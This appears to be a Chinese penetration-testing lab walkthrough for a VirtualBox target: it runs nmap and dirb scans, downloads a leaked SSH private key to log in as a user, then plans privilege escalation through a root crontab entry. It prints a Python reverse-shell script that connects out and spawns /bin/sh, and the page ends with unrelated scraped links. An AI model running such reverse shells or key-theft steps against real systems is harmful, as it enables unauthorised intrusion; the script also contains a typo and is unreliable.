暮秋初九
暮秋初九

ssh服务渗透(拿到第一个用户权限)

**

ssh基础知识:

**

ssh服务渗透(拿到第一个用户权限)_第1张图片ssh服务渗透(拿到第一个用户权限)_第2张图片ssh服务渗透(拿到第一个用户权限)_第3张图片ssh服务渗透(拿到第一个用户权限)_第4张图片

**

一、信息收集

**
探测开放端口服务

root@kali:~# nmap -sV 192.168.1.107
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-05 21:04 CST
Nmap scan report for 192.168.1.107
Host is up (0.00013s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.63 seconds

探测靶场全部信息

root@kali:~# nmap -Av 192.168.1.107

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-05 21:07 CST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Initiating ARP Ping Scan at 21:07
Scanning 192.168.1.107 [1 port]
Completed ARP Ping Scan at 21:07, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:07
Completed Parallel DNS resolution of 1 host. at 21:07, 0.01s elapsed
Initiating SYN Stealth Scan at 21:07
Scanning 192.168.1.107 [1000 ports]
Discovered open port 80/tcp on 192.168.1.107
Discovered open port 22/tcp on 192.168.1.107
Discovered open port 111/tcp on 192.168.1.107
Completed SYN Stealth Scan at 21:07, 0.08s elapsed (1000 total ports)
Initiating Service scan at 21:07
Scanning 3 services on 192.168.1.107
Completed Service scan at 21:07, 6.02s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.107
NSE: Script scanning 192.168.1.107.
Initiating NSE at 21:07
Completed NSE at 21:07, 1.86s elapsed
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Nmap scan report for 192.168.1.107
Host is up (0.00061s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|_  256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title:  Secretsec Company 
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          48509/tcp  status
|_  100024  1          59784/udp  status
MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.002 days (since Fri Jul  5 21:05:28 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.1.107

NSE: Script Post-scanning.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.29 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)

探测主机信息、版本、操作系统

root@kali:~# nmap -O 192.168.1.107

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-05 21:11 CST
Nmap scan report for 192.168.1.107
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
MAC Address: 08:00:27:84:43:C4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds

二、对ssh进行登陆

对于SSH服务的22端口的靶场,首先考虑:

  1、暴力破解

  2、私钥泄露(私钥有没有对应的密码、是否可以找到私钥的用户名)

对于SSH服务的22端口的靶场首先考虑

  1、通过浏览器访问对应的靶场http服务,如http://靶场IP地址:http服务端口

  2、使用探测工具对http的目录进行探测,如dirb http://靶场IP地址:http服务端口/

要注意大于1024的端口
**

三、渗透开始

**

使用浏览器对靶场IP的http服务探测,对页面中展示的内容也要注意,尤其是联系人等信息(有可能就是ssh的用户名信息),递归访问,力争把每一个dirb扫描到的目录页面都访问查看;
尤其对robots.txt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa)。
进入web网站:
ssh服务渗透(拿到第一个用户权限)_第5张图片

root@kali:~# dirb http://192.168.1.107/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul  6 07:00:38 2019
URL_BASE: http://192.168.1.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.107/ ----
==> DIRECTORY: http://192.168.1.107/files/                                       
==> DIRECTORY: http://192.168.1.107/icons/                                       
+ http://192.168.1.107/index.html (CODE:200|SIZE:5651)                           
==> DIRECTORY: http://192.168.1.107/manual/                                      
+ http://192.168.1.107/robots.txt (CODE:200|SIZE:57)                             
+ http://192.168.1.107/server-status (CODE:403|SIZE:301)                         
                                                                                 
---- Entering directory: http://192.168.1.107/files/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                 
---- Entering directory: http://192.168.1.107/icons/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                 
---- Entering directory: http://192.168.1.107/manual/ ----
==> DIRECTORY: http://192.168.1.107/manual/da/                                   
==> DIRECTORY: http://192.168.1.107/manual/de/                                   
==> DIRECTORY: http://192.168.1.107/manual/en/                                   
==> DIRECTORY: http://192.168.1.107/manual/es/                                   
==> DIRECTORY: http://192.168.1.107/manual/fr/                                   
==> DIRECTORY: http://192.168.1.107/manual/images/                               
+ http://192.168.1.107/manual/index.html (CODE:200|SIZE:626)                     
==> DIRECTORY: http://192.168.1.107/manual/ja/                                   
==> DIRECTORY: http://192.168.1.107/manual/ko/                                   
==> DIRECTORY: http://192.168.1.107/manual/style/                                
==> DIRECTORY: http://192.168.1.107/manual/tr/                                   
==> DIRECTORY: http://192.168.1.107/manual/zh-cn/                                
                                                                                 
---- Entering directory: http://192.168.1.107/manual/da/ ----
==> DIRECTORY: http://192.168.1.107/manual/da/developer/                         
==> DIRECTORY: http://192.168.1.107/manual/da/faq/                               
==> DIRECTORY: http://192.168.1.107/manual/da/howto/                             
+ http://192.168.1.107/manual/da/index.html (CODE:200|SIZE:9041)                 
==> DIRECTORY: http://192.168.1.107/manual/da/misc/                              
==> DIRECTORY: http://192.168.1.107/manual/da/mod/                               
==> DIRECTORY: http://192.168.1.107/manual/da/programs/                          
==> DIRECTORY: http://192.168.1.107/manual/da/ssl/                               
                                                                                 
---- Entering directory: http://192.168.1.107/manual/de/ ----
==> DIRECTORY: http://192.168.1.107/manual/de/developer/                         
==> DIRECTORY: http://192.168.1.107/manual/de/faq/                               
==> DIRECTORY: http://192.168.1.107/manual/de/howto/                             
+ http://192.168.1.107/manual/de/index.html (CODE:200|SIZE:9290)                 
==> DIRECTORY: http://192.168.1.107/manual/de/misc/                              
==> DIRECTORY: http://192.168.1.107/manual/de/mod/

我们通过查找文件,发现了私钥信息:
ssh服务渗透(拿到第一个用户权限)_第6张图片对于挖掘敏感信息,我们除了用dirb之外,还可以用nikto。

nikto  -host  192.168.1.107

之后我们下载私钥信息:

root@kali:~# cd 桌面/
root@kali:~/桌面# wget "http://192.168.1.107/icons/VDSoyuAXiO.txt"
--2019-07-06 07:41:26--  http://192.168.1.107/icons/VDSoyuAXiO.txt
正在连接 192.168.1.107:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:1677 (1.6K) [text/plain]
正在保存至: “VDSoyuAXiO.txt”

VDSoyuAXiO.txt      100%[===================>]   1.64K  --.-KB/s    in 0s      

2019-07-06 07:41:26 (217 MB/s) - 已保存 “VDSoyuAXiO.txt” [1677/1677])

将文件命名:

root@kali:~/桌面# mv VDSoyuAXiO.txt ID_tas

赋权限:

root@kali:~/桌面# chmod 600 ID_tas

登陆目标ssh:
(ssh登录提示WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!)

root@kali:~# ssh -i id_rsa  [email protected]
The authenticity of host '192.168.1.107 (192.168.1.107)' can't be established.
ECDSA key fingerprint is SHA256:YGvYXYw8dQn8xgGpWP4AlYshhJ6D4SqY71chPOERGwE.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': yes
Warning: Permanently added '192.168.1.107' (ECDSA) to the list of known hosts.

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun  9 20:31:29 2017 from 192.168.0.42

READY TO ACCESS THE SECRET LAB ? 

secret password : 55      
WELCOME ! 
martin@debian:~$

查看当前用户,用户下的文件:

martin@debian:~$ pwd         //查看当前用户
/home/martin
martin@debian:~$ ls -alh   //当前用户下的所有文件
total 28K
drwxr-xr-x 3 martin martin 4,0K juin   8  2017 .
drwxr-xr-x 5 root   root   4,0K juin   9  2017 ..
-rw------- 1 martin martin  606 juin   9  2017 .bash_history
-rw-r--r-- 1 martin martin  220 juin   7  2017 .bash_logout
-rwx--x--x 1 martin martin 3,5K juin   7  2017 .bashrc
-rw-r--r-- 1 martin martin  675 juin   7  2017 .profile
drwxr-xr-x 2 root   root   4,0K juin   7  2017 .ssh
martin@debian:~$ cd /home      //切换到home目录下查看所有用户
martin@debian:/home$ ls
hadi  jimmy  martin
martin@debian:/home$ 
martin@debian:/home$ whoami
martin
martin@debian:~$ id         //查看当前用户的权限
uid=1001(martin) gid=1001(martin) groupes=1001(martin)  //并不具有root 的权限

补充:/目录 、/home目录 、~目录的区别
GID为GroupId,即组ID,用来标识用户组的唯一标识符
UID为UserId,即用户ID,用来标识每个用户的唯一标示符

[root@localhost ~]# id lamp
uid=501(lamp) gid=501(lamp) groups=501(lamp)
#能看到uid(用户ID)、gid(初始组ID), groups是用户所在组,这里既可以看到初始组,如果有附加组,则也能看到附加组

以上我们拿到了一个用户的权限,注意是Martin权限不是root权限。
**

四、拿到root权限

**

martin@debian:~$ cat /etc/passwd  //查看所有用户列表
martin@debian:~$ cat /etc/group   //查看用户组
find / -usr 用户名  查看用户名下的文件
cat  /tmp/ 查看缓冲文件

补充:

1.通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要root权限。不同的用户都可以有不同的定时任务
cat /etc/crontab
挖掘其他用户是否有定时任务, 并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。
如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反弹hell,然后netcat执行监听获取对应用户的权限。
如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。

martin@debian:~$ cd /etc/crontab
-bash: cd: /etc/crontab: N'est pas un dossier
martin@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5   * * * *   jimmy   python /tmp/sekurity.py   //重点

查看tmp文件下是否有对应文件:

martin@debian:~$ cd /tmp/
martin@debian:/tmp$ ls
martin@debian:/tmp$ ls -al
total 28
drwxrwxrwt  7 root root 4096 juil.  6 10:55 .
drwxr-xr-x 21 root root 4096 avril 26  2017 ..
drwxrwxrwt  2 root root 4096 juil.  6 10:19 .font-unix
drwxrwxrwt  2 root root 4096 juil.  6 10:19 .ICE-unix
drwxrwxrwt  2 root root 4096 juil.  6 10:19 .Test-unix
drwxrwxrwt  2 root root 4096 juil.  6 10:19 .X11-unix
drwxrwxrwt  2 root root 4096 juil.  6 10:19 .XIM-unix
martin@debian:/tmp$

没有相应的文件,我们就要反弹shell了。
代码为:
ssh服务渗透(拿到第一个用户权限)_第7张图片

既然是反弹shell,反弹shell的原理就是我们使用脚本以至于让被攻击机,打开一个端口,然后我们在攻击机上监听打开的端口。

martin@debian:/tmp$ netstat -pantu  //查看端口使用情况。

反弹shell代码:

#!/usr/bin/python
#coding=utf-8
import os,subprocess,socket



s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.1.107",19))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/sh","-i"])

你可能感兴趣的:(awd)

  • 网络攻防WEB入门指南 youhao108 网络攻防web渗透测试网络安全网络攻防
    网络攻防WEB入门指南(大佬绕路)文章目录前言学习网络攻防该如何入门前言我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度,也就是知名的CTF夺旗赛,来谈谈网络攻防知识如何入门。学习网络攻防该如何入门常规CTF比赛主要分为线上做题,以及线下AWD攻防(AttackWith
  • centos7安装docker-compose haidi8 docker容器运维
    1、下载docker-compose网盘下载:链接:https://pan.baidu.com/s/1pltG3aWiN9zMqYt7ZVyLng提取码:7awd--来自百度网盘超级会员V5的分享2、上传docker-compose文件到/usr/local/bin目录[root@192bin]#ll总用量53892-rwxrwxrwx1rootroot5445384710月1617:27dock
  • AWD-Test2 有搞头-CC BUUCTFweb安全安全安全性测试前端sql
    1.已知账号密码,可SSH连接进行代码审计。2.登录可万能密码进入,也可注册后登录。3.修改url参数,发现报错。确定为Linux系统4.写入一句话,并提交。(也可以文件上传,这里采用简洁的方法)//写入这个,在日志log.php可查看flag5.访问log.php日志文件,发现里面有flaghttp://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buu
  • AWD总结——熟悉环境 weixin_30640291 数据库git操作系统
    1、确定环境是密码登录还是密钥登录密钥登录:(比赛方会提供如下三个文件)将文件导入即可若为密码登录,则看密码是否为随机的哈希值,并推测全场密码是否一样,若一样则首先需要修改密码,避免对方写批量遍历脚本,遍历所有服务器,当可以登录时,就瞬间修改你的机子,然后你就什么都做不了,服务器都落到对方手中,除非重置机子。passwd用户名//linux命令passwdubuntusudopasswdroot/
  • awd总结 访白鹿 python
    总结:由于是第一次参加AWD比赛,各方面经验都不足,在参赛的前几天也是疯狂搜集各种脚本、框架、工具等,同时也参考b站的视频进行学习,我发现就是还是实操才能更快的学习我觉得就是我前期的准备工作不足,也可能是我当时比赛网太卡了,kali一直没有ssh连接上,换了moba连结果半天回应一个连接超时,现下的xshell结果还死活尝试连接不上去,当时就有点慌了,因为比赛已经开始很久了我还没ssh连接上,我就
  • 最常用计算机文件后缀名,文件扩展名/后缀名是什么 常用的文件扩展名大全 乖神队长 最常用计算机文件后缀名
    文件扩展名也称为文件的后缀名,是操作系统用来标记文件类型的一种机制。通常来说,一个扩展名是跟在主文件名后面的,由一个分隔符分隔。下面小编为大家整理了一些常用的文件扩展名。扩展名文件类型打开方式.aiff声音文件WindowsmediaPlayer.!!!Netants暂存文件Netants.ani动画鼠标.arj压缩文件ARJ.avi电影文件WindowsmediaPlayer.awd传真文档.b
  • 2024.2.4 awd总结 木… linux运维服务器
    防御阶段感觉打了几次awd,前面阶段还算比较熟练1.ssh连接靶机登录修改密码[root@8~]#passwdChangingpasswordforuserroot.Newpassword:Retypenewpassword:2.xftp连接备份网站源码我觉得这步还是非常重要的,万一后面被删站。。3.mysql修改密码因为直接连接数据库没连上,所以要找数据库密码在down下来的源码里面找到了php
  • AWD线下赛奇淫技巧 M1r4n CTF网络安全
    AWD线下赛奇淫技巧查看自己,再看看web目录所有者whoamiwlast备份web目录tar-zcvpf/tmp/web.tar.gz/var/www/html/>/dev/null恢复目录tar-zxvpf/tmp/web.tar.gz-C/>/dev/null改权限chmod-R/var/www/html/755批量挂马,优先使用第一个sed-i"1i"*.phpsed-i"1i"*.php
  • CTF——AWD模式小总结 白帽黑客-嘉哥 web安全安全ddos网络安全学习计算机网络安全威胁分析
    本文以bugku平台awd比赛来写awd比赛平台一、防御(比赛开始有30分钟防御时间)比赛开始得到一个靶机,如下信息ssh用户名和密码,还有虚拟ip然后我们ssh连接进行防御,这里我推荐使用Xshell配合Xftp使用,打开xshell新建一个连接,写入相应信息填入用户名还有密码,然后点击连接2.进入之后我们直接点击,xftp按钮(目的:需要连接xftp下载文件)连接成功后如下进入/var/www
  • AWD认识和赛前准备 正在努力中的小白♤ 安全
    AWD介绍AWD:AttackWithDefence,北赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器,服务器(多数为Linux)某处存在flag(一般在根目录下);可能会提供一台流量分析虚拟机,可以下载流量文件进行数据分析;flag在主办方的设定下每隔一定时间刷新一轮;各队一般都有自己的初始分数flag
  • AWD攻防比赛指导手册 渗透测试中心 CTF
    0#什么是AWD0.1#AWD赛制介绍「攻防模式|AWD(AttackWithDefense)」是CTF比赛「CTFCaptureTheFlag」几种主要的比赛模式之一,该模式常见于线下赛。在该模式中,每个队伍都拥有一个相同的初始环境(我们称其为GameBox),该环境通常运行着一些特定的服务或应用程序,而这些服务通常包含一些安全漏洞。参赛队伍需要挖掘利用对方队伍服务中的安全漏洞,获取Flag以获
  • awd骚操作命令学习笔记 BuFFERer
    aliasLinuxalias命令用于设置指令的别名。用户可利用alias,自定指令的别名。若仅输入alias,则可列出目前所有的别名设置。alias的效力仅及于该次登入的操作。若要每次登入是即自动设好别名,可在.profile或.cshrc中设定指令的别名。alias[别名]=[指令名称]1.alias显示当前所有的别名2.alias[别名]显示别名代表的命令3.alias新命令='原命令'4.
  • python爬虫AES魔改案例:某音乐素材下载网 局外人LZ pythonpython爬虫
    声明:该文章为学习使用,严禁用于商业用途和非法用途,违者后果自负,由此产生的一切后果均与作者无关一、找出需要加密的参数js运行atob(‘aHR0cHM6Ly93d3cuYWlnZWkuY29tL3NvdW5kL2NsYXNzLw==’)拿到网址,F12打开调试工具,点击任意导航发送请求,找到gei-common/jsonComp/f/awd/log.json请求分析请求头、参数、响应结果会发现响
  • WP篇 某网杯WEBAWD踩坑 这周末在做梦 wp篇javatomcatintellij-idea
    某网杯事件回顾赛题环境坑木马访问JSP显示空白Ubuntu与Mysql问题框架选择idea事件回顾虽然没有参与本次AWD,但是看到另外一只队伍down下来的文件,我还是忍不住心动了,于是决定复现一番,因为某些原因,详细的wp和复现的环境就不公开了。这篇文章主要介绍一下本次比赛和个人复现中所踩的坑。赛题本次线下AWD共5道题,3道web(easyCMS、authSite、bookshop),2道pw
  • python中的后渗透|也可用于AWD攻防--shell管理 RedTeamWing
    在所有的旋律中,wing对说散就散最专一!wing0x00前言在平时或者线下AWD的时候,有一个shell管理器可以让我们打到事半功倍的效果。前提你要能获得别人shell,不然这个也没什么用了。我这里写好的这个只是一个思路,真正的后渗透工具,远比这个强大。0x01具体思路先看有哪些主机和自己已经连接了加一个多线程管理然后就是给连接的主机编号,哪个主机是哪个ip选择相应的主机编号,进入对方shell
  • X-NUCA2017线下赛赛后总结 Killshadow
    这篇文章主要从防御角度来写,防护好自己的服务器,免受对手拿flag,以及如何绕过AWD模式下主办方的checker。比赛之前都是在做逆向的,学了几天Pwn,Patch方式比较粗暴,希望大佬别见怪,应该有很多疏漏,请指出。Calckali下执行该软件,输入各种计算,构造内存泄漏Calc文件计算部分函数相对应的16进制编码用010直接改申请的内存空间大小关于使用malloc需要注意的地方:A、申请了内
  • 新书速递!《AWD特训营》CTF/AWD竞赛标准参考书+实战指南 爱玩电脑的呆呆 php开发语言
    随着网络安全问题日益凸显,国家对网络安全人才的需求持续增长,其中,网络安全竞赛在国家以及企业的人才培养和选拔中扮演着至关重要的角色。在数字化时代,企业为了应对日益增长的攻击威胁,一般都在大量部署安全产品、安全设备,忙于查看各种安全设备、安全运营中心(SOC)、安全态势感知平台中的告警数据,期望在早期阶段就捕获到攻击者行为并实现以下4个目标:一是最大限度减少攻击者的入侵时间,尽可能让其丧失对目标的访
  • AWD的那些事 战神/calmness 安全测试:web\app\工具信息安全功防
    目录介绍比赛形式与规则比赛网络环境AWD考——内容:加固信息收集漏洞检查加强防护Awd中pwn防护使用python打补丁编写伪程序替换有漏洞的程序使用赋值破坏逻辑结构编写判断语句最基本打补丁攻击团队协作常见的技巧方式总结开始后的时间需要完成的内容:注意事项介绍AWD赛制是一种网络安全竞赛的赛制。AWD赛制由安全竞赛专家及行业专家凭借十多年实战经验,将真实网络安全防护设备设施加入抽象的网络环境中,模
  • 第六周 线下AWD总结 tothemoon_2019
    博客:https://tothemoon2019.github.io/2020/11/06/1/文章目录第六周线下AWD总结1.工具AoiAWD(脚本已编译好)D盾,Seay,Xshell一些批量自动脚本监控本地文件生成ip列表,读取flag批量连接ssh(python2,可用于爆破弱密码)2.注意事项root权限,数据库靶机3.总结第六周线下AWD总结上周跟着工作室的大佬们去沈阳参加了第三届辽宁
  • AWD:赛前准备工作以及深度脚本讲解 薯片薯条 AWD安全服务器web安全
    本文主要介绍了一些网络攻防对抗赛的常用方法,也就是俗称的AWD比赛。一.比赛介绍AWD赛制是按照分组来进行比赛的。每组3-4人,经过不同的分工,从而实现对服务器的维护以及对其他人的服务器进行攻击。每个服务器都会有一个提前放好的有漏洞的网站,需要进行代码审计,然后修补漏洞。举个例子,某些参数一可以参杂系统的cmd命令上来,如果执行成功,就会获取你服务器上某个文件夹下的flag.txt的内容,一旦获取
  • AWD竞赛全流程解析 网络安全大本营 服务器web安全网络安全计算机网络网络攻击模型
    AWD(AttackWithDefense,攻防兼备)是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取Flag分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。这种模式非常激烈,赛前准备要非常充分,手上要有充足的防守方案和EXP攻击脚本,而且参赛越多,积累的经验就越多,获胜的希望就越大。常见形式常见的形式
  • CTF-AWD入门手册 哈喽沃德er 数据库
    引文AWD赛制是一种网络安全竞赛的赛制。AWD赛制由安全竞赛专家及行业专家凭借十多年实战经验,将真实网络安全防护设备设施加入抽象的网络环境中,模拟政府、企业、院校等单位的典型网络结构和配置,开展的一种人人对抗的竞赛方式,考验参赛者攻防兼备的能力。其主要特点为:强调实战性、实时性、对抗性,综合考量竞赛队的渗透能力和防护能力。本文就个人经验来讲一下AWD比赛中需要做的事。站点部署比赛开始时我们会分配到
  • 【网安必读】CTF/AWD实战速胜指南《AWD特训营》 秋说 网络安全web安全CTFAWD网络安全信息安全黑客白帽
    文章目录前言正文这本书好在哪这本书讲了什么文末送书前言【文末送书】今天推荐一本网安领域优质书籍《AWD特训营》,本文将从其内容与优势出发,详细阐发其对于网安从业人员的重要性与益处。正文本书为博主推荐的必读书目之一,适用于以下读者:网络安全爱好者网络安全从业人员企业IT运维人员信息安全及相关专业的大学生随着网络安全问题日益凸显,国家对网络安全人才的需求持续增长,随着知识的指数式增长及政策扶持,安全行
  • 关于awd赛制的学习路程·awd的理论内容 南欢richrich awd学习
    什么是awdAWD(AttackWithDefense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取Flag分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。在攻防模式中,参赛队伍分别防守同样配置的虚拟靶机,并在有限的博弈时间内,找到其他战队的薄弱环节进行攻击,同时要对自己的靶机环境进行
  • AWD比赛中的一些防护思路技巧 告白热 CTF总结python
    ##思路1:1、改服务器密码(1)linux:passwd(2)如果是root删除可登录用户:cat/etc/passwd|grepbashuserdel-r用户名(3)mysql:updatemysql.usersetpassword=md5(‘密码’)whereuser=‘root’;进入mysql:5.7之后的版本updateusersetauthentication_string=pass
  • AWD比赛入门攻略总结 渗透测试老鸟-九青 CTFweb安全c#
    这是一本能让你从零开始学习AWD并深入AWD的手册纸上得来终觉浅,绝知此事要躬行。目录纸上得来终觉浅,绝知此事要躬行。0#什么是AWD0.1#AWD赛制介绍0.2#比赛整体流程1#比赛环境2#安全加固环节(Defense)2.0#基本加固流程2.0.1Windows加固流程2.0.2Linux加固流程2.1#基本信息搜集2.1.1明确Linux机器信息2.1.2明确Windows机器信息2.1.3
  • 记一次 AWD 比赛中曲折的 Linux 提权 m0rta1 漏洞复现与原理分析linux运维服务器
    前提背景:今天一场AWD比赛中,遇到一个场景:PHP网站存在SQL注入和文件上传漏洞,MYSQL当前用户为ROOT,文件上传蚁剑连接SHELL是权限很低的用户。我需要想办法进行提权,才能读取到/root目录下的flag。一、sqlmap--os-shell提权看到当前用户是DBA都会想着--os-shell提权拿shell,然后直接读取/root里面的flag。然而我试了半天,一直无法获取shel
  • 从红队视角看AWD攻击 前端开发小司机 web安全网络安全系统安全安全架构计算机网络网络攻击模型ddos
    AWD的权限维持攻防兼备AWD模式是一种综合考核参赛团队攻击、防御技术能力、即时策略的比赛模式。在攻防模式中,参赛队伍分别防守同样配置的虚拟靶机,并在有限的博弈时间内,找到其他战队的薄弱环节进行攻击,同时要对自己的靶机环境进行加固防守。在AWD需要权限维持,但通常情况下,我们使用不死马来维持权限:');//创建shell.phpsleep(0);//间隔时间}?>上传之后,访问该页面,就会不断生成
  • PicoDiagnostics (NVH设备软件)-NVH软件计算原理探究 虹科Pico汽车示波器 振动异响(NVH)汽车汽车维修与诊断汽车维修与保养汽车示波器虹科Pico汽车示波器
    NVH问题探讨PicoDiagnostics(NVH设备软件)对于不同驱动方式的车辆、是否通过OBD口读取转速和速度,后轮差速传动比数值对其频率计算原理也是有影响的。究竟什么时候需要填后轮差速传动比呢?下面做一些探讨:连接OBD诊断口计算速度&频率(FWD)连接OBD诊断口计算速度&频率(AWD&4WD)没有连接OBD诊断口计算的速度&频率(RWD)举个例子:使用OBD连接手动切换到“计算行驶速度
  • ctf-web:关于文件上传漏洞的深入研究 薯片薯条 ctf-webphp
    上次我们研究了关于文件上传的漏洞,这次我们研究的内容属于上节课的补充内容,大约是关于文件上传的绕过与防御.怎么说呢,算是一种锻炼吧.因为下个月有个awd的比赛,因此最近会经常发一些关于web的内容.其实我还是挺慌的,因为以前参加的都是ctf线上赛,而且我做的都是逆向这个方面的,然而这次突然来了个web,搞得我有点懵.web也是最近才开始研究的,所以写的可能不尽人意,希望各位大佬看看就好,不喜勿喷.
  • ztree异步加载 3213213333332132 JavaScriptAjaxjsonWebztree
    相信新手用ztree的时候,对异步加载会有些困惑,我开始的时候也是看了API花了些时间才搞定了异步加载,在这里分享给大家。 我后台代码生成的是json格式的数据,数据大家按各自的需求生成,这里只给出前端的代码。 设置setting,这里只关注async属性的配置 var setting = { //异步加载配置
  • thirft rpc 具体调用流程 BlueSkator 中间件rpcthrift
    Thrift调用过程中,Thrift客户端和服务器之间主要用到传输层类、协议层类和处理类三个主要的核心类,这三个类的相互协作共同完成rpc的整个调用过程。在调用过程中将按照以下顺序进行协同工作:         (1)     将客户端程序调用的函数名和参数传递给协议层(TProtocol),协议
  • 异或运算推导, 交换数据 dcj3sjt126com PHP异或^
    /* * 5 0101 * 9 1010 * * 5 ^ 5 * 0101 * 0101 * ----- * 0000 * 得出第一个规律: 相同的数进行异或, 结果是0 * * 9 ^ 5 ^ 6 * 1010 * 0101 * ---- * 1111 * * 1111 * 0110 * ---- * 1001
  • 事件源对象 周华华 JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • MySql配置及相关命令 g21121 mysql
